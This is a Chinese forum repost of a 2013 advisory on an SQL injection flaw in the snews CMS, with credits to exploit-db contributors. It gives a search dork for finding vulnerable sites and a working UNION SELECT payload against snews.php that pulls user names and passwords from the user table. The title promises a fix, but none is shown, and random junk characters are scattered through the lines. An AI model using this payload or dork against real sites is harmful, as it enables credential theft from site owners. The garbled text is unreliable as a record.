找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2100|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability* I9 t& h+ j8 C( S4 Q
作者: By onestree6 ~6 p* J8 O/ i" r# O4 B" F
下载地址 : http://snewscms.com/
1 g; }( A5 E) c! |& K" I测试平台 : ubuntu 12.10 / win 7
. s6 P7 ?+ ~# t+ M) \( B: h关键词: inurl:"tanyakan pada rumput yang bergoyang"6 X0 M. T3 ~0 L; k) K& L7 L
3 [: _( v. Z( B$ x

; u) B- c, t$ i( ~*************************************************************
3 ~" O. v3 S* J  V2 D7 u 9 S, J8 `+ Y) W
SQL poc:1 K# ~% t, S. _' D9 |

& U, n& ]6 J+ X0 i! x, Ehttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
# R- q( C' y7 h3 l % X, Z/ Q& [' E/ Y% Q! V% L: U
示例
# n1 w  y! I- m2 g
+ Q% d! M. j6 ~; [9 f8 ]http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
; U" P, Z1 ^+ k4 T2 d
$ Q/ {7 }+ V0 ?% J& Y/ w" t 9 l6 ]  N9 u& o* n, F2 R/ N6 _
致谢:- f  B- x1 J+ Y; I

, u) p- j! \8 X1 D  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
4 c/ X8 n* N# J" v, V0 P; J     ) M1 {" D% b4 f  n1 Q2 a
          indonesiancoder - moeslimh4x0r - go-coder: X- b2 Z& E7 A
, G- |- X) W( [! B$ ]* Z8 R
spesial my hunny :*
/ q0 s% f4 g& @2 G/ Q1 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表